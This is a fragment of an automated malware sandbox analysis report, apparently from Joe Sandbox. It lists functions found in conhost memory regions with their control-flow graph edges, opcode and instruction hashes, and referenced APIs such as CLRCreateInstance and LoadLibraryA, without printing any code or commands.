                                                                  • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                  • Instruction Fuzzy Hash: 31C1DA30310B09CBEB59EA2CC499FBD73D9FB94760F14056DD58AC7186DB21D982CB92
                                                                  Function 00007FFD9BAA41A6 Relevance: .5, Instructions: 471COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 200 7ffd9baa41a6-7ffd9baa41b3 201 7ffd9baa41b5-7ffd9baa41bd 200->201 202 7ffd9baa41be-7ffd9baa4287 200->202 201->202 206 7ffd9baa4289-7ffd9baa4292 202->206 207 7ffd9baa42f3 202->207 206->207 208 7ffd9baa4294-7ffd9baa42a0 206->208 209 7ffd9baa42f5-7ffd9baa431a 207->209 210 7ffd9baa42d9-7ffd9baa42f1 208->210 211 7ffd9baa42a2-7ffd9baa42b4 208->211 216 7ffd9baa4386 209->216 217 7ffd9baa431c-7ffd9baa4325 209->217 210->209 212 7ffd9baa42b6 211->212 213 7ffd9baa42b8-7ffd9baa42cb 211->213 212->213 213->213 215 7ffd9baa42cd-7ffd9baa42d5 213->215 215->210 218 7ffd9baa4388-7ffd9baa4430 216->218 217->216 219 7ffd9baa4327-7ffd9baa4333 217->219 230 7ffd9baa449e 218->230 231 7ffd9baa4432-7ffd9baa443c 218->231 220 7ffd9baa4335-7ffd9baa4347 219->220 221 7ffd9baa436c-7ffd9baa4384 219->221 223 7ffd9baa4349 220->223 224 7ffd9baa434b-7ffd9baa435e 220->224 221->218 223->224 224->224 226 7ffd9baa4360-7ffd9baa4368 224->226 226->221 232 7ffd9baa44a0-7ffd9baa44c9 230->232 231->230 233 7ffd9baa443e-7ffd9baa444b 231->233 240 7ffd9baa44cb-7ffd9baa44d6 232->240 241 7ffd9baa4533 232->241 234 7ffd9baa444d-7ffd9baa445f 233->234 235 7ffd9baa4484-7ffd9baa449c 233->235 237 7ffd9baa4461 234->237 238 7ffd9baa4463-7ffd9baa4476 234->238 235->232 237->238 238->238 239 7ffd9baa4478-7ffd9baa4480 238->239 239->235 240->241 242 7ffd9baa44d8-7ffd9baa44e6 240->242 243 7ffd9baa4535-7ffd9baa45c6 241->243 244 7ffd9baa44e8-7ffd9baa44fa 242->244 245 7ffd9baa451f-7ffd9baa4531 242->245 251 7ffd9baa45cc-7ffd9baa45db 243->251 247 7ffd9baa44fc 244->247 248 7ffd9baa44fe-7ffd9baa4511 244->248 245->243 247->248 248->248 249 7ffd9baa4513-7ffd9baa451b 248->249 249->245 252 7ffd9baa45dd 251->252 253 7ffd9baa45e3-7ffd9baa4648 call 7ffd9baa4664 251->253 252->253 260 7ffd9baa464a 253->260 261 7ffd9baa464f-7ffd9baa4663 253->261 260->261
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f30a17c2407a20583cdb76a1d7c48807895cbd63725f76e67cc53b95d9eb1d1c
                                                                  • Instruction ID: 9e3eb298b37edd2c30deae64088a7a673842614395110b00422078090fcec09a
                                                                  • Opcode Fuzzy Hash: f30a17c2407a20583cdb76a1d7c48807895cbd63725f76e67cc53b95d9eb1d1c
                                                                  • Instruction Fuzzy Hash: 7EF1D830609A4E8FEBA8EF28C8657E977D1FF55310F04426EE84DC72A5CF74A9458B81
                                                                  Function 00007FFD9BAA4F52 Relevance: .5, Instructions: 457COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 262 7ffd9baa4f52-7ffd9baa4f5f 263 7ffd9baa4f6a-7ffd9baa5037 262->263 264 7ffd9baa4f61-7ffd9baa4f69 262->264 268 7ffd9baa5039-7ffd9baa5042 263->268 269 7ffd9baa50a3 263->269 264->263 268->269 271 7ffd9baa5044-7ffd9baa5050 268->271 270 7ffd9baa50a5-7ffd9baa50ca 269->270 278 7ffd9baa5136 270->278 279 7ffd9baa50cc-7ffd9baa50d5 270->279 272 7ffd9baa5089-7ffd9baa50a1 271->272 273 7ffd9baa5052-7ffd9baa5064 271->273 272->270 274 7ffd9baa5066 273->274 275 7ffd9baa5068-7ffd9baa507b 273->275 274->275 275->275 277 7ffd9baa507d-7ffd9baa5085 275->277 277->272 280 7ffd9baa5138-7ffd9baa515d 278->280 279->278 281 7ffd9baa50d7-7ffd9baa50e3 279->281 287 7ffd9baa51cb 280->287 288 7ffd9baa515f-7ffd9baa5169 280->288 282 7ffd9baa50e5-7ffd9baa50f7 281->282 283 7ffd9baa511c-7ffd9baa5134 281->283 285 7ffd9baa50f9 282->285 286 7ffd9baa50fb-7ffd9baa510e 282->286 283->280 285->286 286->286 289 7ffd9baa5110-7ffd9baa5118 286->289 291 7ffd9baa51cd-7ffd9baa51fb 287->291 288->287 290 7ffd9baa516b-7ffd9baa5178 288->290 289->283 292 7ffd9baa517a-7ffd9baa518c 290->292 293 7ffd9baa51b1-7ffd9baa51c9 290->293 298 7ffd9baa526b 291->298 299 7ffd9baa51fd-7ffd9baa5208 291->299 294 7ffd9baa518e 292->294 295 7ffd9baa5190-7ffd9baa51a3 292->295 293->291 294->295 295->295 297 7ffd9baa51a5-7ffd9baa51ad 295->297 297->293 300 7ffd9baa526d-7ffd9baa5345 298->300 299->298 301 7ffd9baa520a-7ffd9baa5218 299->301 311 7ffd9baa534b-7ffd9baa535a 300->311 302 7ffd9baa521a-7ffd9baa522c 301->302 303 7ffd9baa5251-7ffd9baa5269 301->303 304 7ffd9baa522e 302->304 305 7ffd9baa5230-7ffd9baa5243 302->305 303->300 304->305 305->305 307 7ffd9baa5245-7ffd9baa524d 305->307 307->303 312 7ffd9baa535c 311->312 313 7ffd9baa5362-7ffd9baa53c4 call 7ffd9baa53e0 311->313 312->313 320 7ffd9baa53c6 313->320 321 7ffd9baa53cb-7ffd9baa53df 313->321 320->321
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 684f1edd6f49e56c7de76862b6686b6b7f3387234d284d639ef9de3da0e4648b
                                                                  • Instruction ID: 50938c7a44e04375ff0f259356c0f06c908b23308a3d0b17ddd197897beadc6c
                                                                  • Opcode Fuzzy Hash: 684f1edd6f49e56c7de76862b6686b6b7f3387234d284d639ef9de3da0e4648b
                                                                  • Instruction Fuzzy Hash: 6DE1B330A09A4E8FEBA8EF28C8657F977D1FF54310F15426EE84DC7295CE74A9448B81
                                                                  Function 00000299653042B2 Relevance: 1.7, APIs: 1, Instructions: 235COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 101 299653042b2-299653042ec 102 299653042f2-29965304305 CLRCreateInstance 101->102 103 299653044f5-299653044f7 101->103 106 2996530430b-29965304345 102->106 107 299653044d1-299653044d2 102->107 104 299653044fd-29965304503 103->104 105 29965304392-2996530439e 103->105 109 299653044b5-299653044d0 104->109 112 299653044b2-299653044b3 105->112 113 299653043a4-299653043f3 105->113 115 29965304387-29965304388 106->115 116 29965304347-2996530435a 106->116 108 299653044d4-299653044ed 107->108 108->103 112->109 113->112 126 299653043f9-2996530440f 113->126 118 2996530438a-2996530438c 115->118 116->108 121 29965304360-29965304368 116->121 118->105 118->108 121->118 123 2996530436a-29965304380 121->123 125 29965304385 123->125 125->118 126->112 128 29965304415-29965304446 126->128 128->112 130 29965304448-29965304454 128->130 131 2996530446b-29965304477 130->131 132 29965304456-29965304469 130->132 133 2996530447f-29965304491 131->133 132->131 132->132 134 299653044a9-299653044aa 133->134 135 29965304493-299653044a7 133->135 134->112 135->134 135->135
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029965300000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_29965300000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID:
                                                                  • API String ID: 542301482-0
                                                                  • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                  • Instruction ID: 39c2e05ad7ee9b885a23f48ced91d8bf81656abf957d1ca36ab918e3a6ec924f
                                                                  • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                  • Instruction Fuzzy Hash: AF817231208F088FD768EF28C888BAAB7E5FFA5351F004A6DD59BC7151EA31E645CB51
                                                                  Function 00000299653037BA Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 136 299653037ba-299653037dd LoadLibraryA 137 299653037e9-299653037fc 136->137 138 299653037df-299653037e4 136->138 141 299653038be 137->141 142 29965303802-29965303813 137->142 139 299653038c0-299653038d0 138->139 141->139 142->141 143 29965303819-29965303831 142->143 143->141 145 29965303837-2996530386b call 29965305c5e 143->145 145->141 150 2996530386d-2996530387e 145->150 150->141 151 29965303880-29965303897 150->151 151->141 153 29965303899-299653038b9 call 29965305c5e 151->153 153->138
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029965300000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_29965300000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                  • Instruction ID: ef830c8203f151aed60703a722155ab83223dfa166f9a7bef51b0ef1dec9add3
                                                                  • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                  • Instruction Fuzzy Hash: 4531A53130CA098FEB49AA6CA849AAA73D9E794760F00115DED4BC3286DD74ED4687D2
                                                                  Function 00000299653036AF Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 157 299653036af-299653036c5 LoadLibraryA 158 299653036d1-299653036e4 157->158 159 299653036c7-299653036cc 157->159 162 299653036ea-299653036fb 158->162 163 299653037a6 158->163 160 299653037a8-299653037b8 159->160 162->163 164 29965303701-29965303719 162->164 163->160 164->163 166 2996530371f-29965303753 call 29965305c5e 164->166 166->163 171 29965303755-29965303766 166->171 171->163 172 29965303768-2996530377f 171->172 172->163 174 29965303781-299653037a1 call 29965305c5e 172->174 174->159
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029965300000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_29965300000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                  • Instruction ID: 5bfd0fbcdfcb49f1ea94ce5920c3ae7bdd1402f1c59e3c28ce6f80e7639a49b7
                                                                  • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                  • Instruction Fuzzy Hash: 8431A13130CE088BDB54AA5C9889B6A73DAE7D8B60F04025DDD0BC72C9DD61DD818792
                                                                  Function 00000299653036A2 Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 178 299653036a2-299653036c5 LoadLibraryA 180 299653036d1-299653036e4 178->180 181 299653036c7-299653036cc 178->181 184 299653036ea-299653036fb 180->184 185 299653037a6 180->185 182 299653037a8-299653037b8 181->182 184->185 186 29965303701-29965303719 184->186 185->182 186->185 188 2996530371f-29965303753 call 29965305c5e 186->188 188->185 193 29965303755-29965303766 188->193 193->185 194 29965303768-2996530377f 193->194 194->185 196 29965303781-299653037a1 call 29965305c5e 194->196 196->181
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029965300000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_29965300000_conhost.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                  • Instruction ID: c38ad8eda7f3f4d29248dc1c2afadf0f729ef8267f1998ccb39e02e5f12c392b
                                                                  • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                  • Instruction Fuzzy Hash: 92E0D83160CB0D5FF758969DD88ABB666DCD7962B1F00002EE649C2201E045D89143A2
                                                                  Function 00007FFD9BAA0580 Relevance: .3, Instructions: 268COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 902744b0e0739c435f523da74de0e8251aa74bea1bc7b77c55c171f80247c927
                                                                  • Instruction ID: 62c461bf09c75db776fb7c982fd4a321d525bd98dd1df2412d758731334bdc54
                                                                  • Opcode Fuzzy Hash: 902744b0e0739c435f523da74de0e8251aa74bea1bc7b77c55c171f80247c927
                                                                  • Instruction Fuzzy Hash: 2771F871B0DA484FEB58FBBC946A6B977D2EF99714F04017DE48EC3293CE64A8028745
                                                                  Function 00007FFD9BAA0561 Relevance: .3, Instructions: 258COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd52b716409190460ea62701b42b3bf935ae272781b8159ed87b618c5ba5456d
                                                                  • Instruction ID: ef0d57a3499b7d42dc753bc986c337ee6fc910af00c139f801717fc8382b9690
                                                                  • Opcode Fuzzy Hash: dd52b716409190460ea62701b42b3bf935ae272781b8159ed87b618c5ba5456d
                                                                  • Instruction Fuzzy Hash: 34612B71B0DA484FEB54EBBC986A6B977D1EF99710F05017EE48EC3293CE64AC028745
                                                                  Function 00007FFD9BAA0A3A Relevance: .2, Instructions: 225COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 27ce2445e480c514046062380682bd0dd6a8af42b2a1ffd4395458740d67f0cd
                                                                  • Instruction ID: e9ef50d1a6d360a64311c96e27ba81146f073afb41aedd2f7fcc0074392cd299
                                                                  • Opcode Fuzzy Hash: 27ce2445e480c514046062380682bd0dd6a8af42b2a1ffd4395458740d67f0cd
                                                                  • Instruction Fuzzy Hash: C2614930B0A6494FE775AFB884756B97BD2EF4A300F0100BAD48DC72E2CE686906C355
                                                                  Function 00007FFD9BAA0929 Relevance: .1, Instructions: 104COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e1836ca8c702b1531492ed5c20145160ebcc5d0e8039a9a427936a42b2f10e01
                                                                  • Instruction ID: 6664bbda6d4c62be18a3b922740709605d6ace45dea9a81ad76df6d8047878c8
                                                                  • Opcode Fuzzy Hash: e1836ca8c702b1531492ed5c20145160ebcc5d0e8039a9a427936a42b2f10e01
                                                                  • Instruction Fuzzy Hash: 1F315C61B1EAC80FE7759B7844B95BD7BE1EF56711B4404BED089C32E3CE28A9098341
                                                                  Function 00007FFD9BAA040D Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 545 7ffd9baa040d-7ffd9baa040e 546 7ffd9baa0410-7ffd9baa0439 545->546 551 7ffd9baa043b-7ffd9baa04a1 546->551 556 7ffd9baa04c4 551->556 557 7ffd9baa04a3-7ffd9baa04c1 551->557 558 7ffd9baa04cb-7ffd9baa04de 556->558 557->556
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 20c5a485280be7d2efa3f0cc2133a48dff91c1589596d072eec794fc0825932d
                                                                  • Instruction ID: 2780e021c073f40e675a52704f1ee4701c5ec15838a1efa63d5fcc5df5d01e05
                                                                  • Opcode Fuzzy Hash: 20c5a485280be7d2efa3f0cc2133a48dff91c1589596d072eec794fc0825932d
                                                                  • Instruction Fuzzy Hash: 2A21BD92A0EACA5FE7635BB848B51B87FA1EE2720070E00EBC0D8C71E3D9545919C356
                                                                  Function 00007FFD9BAA0080 Relevance: .1, Instructions: 98COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 975aa4d4e0bc1c8a6d717f4f0ea9ddaf4ce18665199f0cbd07a1399017138df9
                                                                  • Instruction ID: 7f9f290d414d5eb83d2d35caf1eb03192fe13c4c26da5ccb40e4da247317dd65
                                                                  • Opcode Fuzzy Hash: 975aa4d4e0bc1c8a6d717f4f0ea9ddaf4ce18665199f0cbd07a1399017138df9
                                                                  • Instruction Fuzzy Hash: 47215C21B1998D1FF775ABBC44B95BE77E2EF96710F14047DE08EC32A6CD146D0A8242
                                                                  Function 00007FFD9BAA0852 Relevance: .1, Instructions: 71COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fd1350ed56e1dcd7521407860a85845c5c5a9b55822558ee210de52f017ed710
                                                                  • Instruction ID: 7433a2d233104a7635ae71ddbd61545e5e112bba917728341708e9d759afe081
                                                                  • Opcode Fuzzy Hash: fd1350ed56e1dcd7521407860a85845c5c5a9b55822558ee210de52f017ed710
                                                                  • Instruction Fuzzy Hash: E921383190E6C64FE32797B448622A5BFA0EF03250F1E01EAD0C8CB0F3D9986056C7A6
                                                                  Function 00007FFD9BAA0C20 Relevance: .1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e544eab36c1e46247dd13da095802df7782f42adbc2e851896f0e8f551130298
                                                                  • Instruction ID: 8a2ecf6b0874b5bc320a5bb9dd59a567530bbd4859596e66e9041eded275ce61
                                                                  • Opcode Fuzzy Hash: e544eab36c1e46247dd13da095802df7782f42adbc2e851896f0e8f551130298
                                                                  • Instruction Fuzzy Hash: 3311081171D9854EE7AAA7BC00367BA6BC2DF46300F0804FAD0CEC72E7CC5C68168355
                                                                  Function 00007FFD9BAA0A2A Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 833859d6fccb19d1d0997cd88dd1b57f140c651e87c5c31b20d6a620b6568661
                                                                  • Instruction ID: 21dcc7f42bd509a61252c30428b92d2c1f47e4caf24ff84c5b4862bcc496577e
                                                                  • Opcode Fuzzy Hash: 833859d6fccb19d1d0997cd88dd1b57f140c651e87c5c31b20d6a620b6568661
                                                                  • Instruction Fuzzy Hash: 9601D650B2EAC54FD756ABBC44B94BD7FE19F5A11030808ECC08AC72A7CD14A91A8745
                                                                  Function 00007FFD9BAA050D Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61fbf6a050069357a136ee444f5070d2e151d627df38f141a1823a1f2ab9cdfb
                                                                  • Instruction ID: 264f02eee928ece9a53e889c86a20859d95f1d02b09e86613c751399c70f9428
                                                                  • Opcode Fuzzy Hash: 61fbf6a050069357a136ee444f5070d2e151d627df38f141a1823a1f2ab9cdfb
                                                                  • Instruction Fuzzy Hash: 57F0BE21B1D98D0FD794E76C8865A5467C2EB98220B1A05B6D00CCB297DD28D8518341
                                                                  Function 00007FFD9BAA04E1 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000E.00000002.2907348136.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_14_2_7ffd9baa0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3cb708f4bf861f5e1abf42ea932c9981487bc9b979e67b7bdc635507f6c159ab
                                                                  • Instruction ID: d368bab1175b7165271e94f605b03dec350d3ecfacc723cced1f57633935a4b0
                                                                  • Opcode Fuzzy Hash: 3cb708f4bf861f5e1abf42ea932c9981487bc9b979e67b7bdc635507f6c159ab
                                                                  • Instruction Fuzzy Hash: 88E0173590594DDFDB81EFA8C8595FEBBB1FE5A302B04059AD48AC3260CB3065A3CB80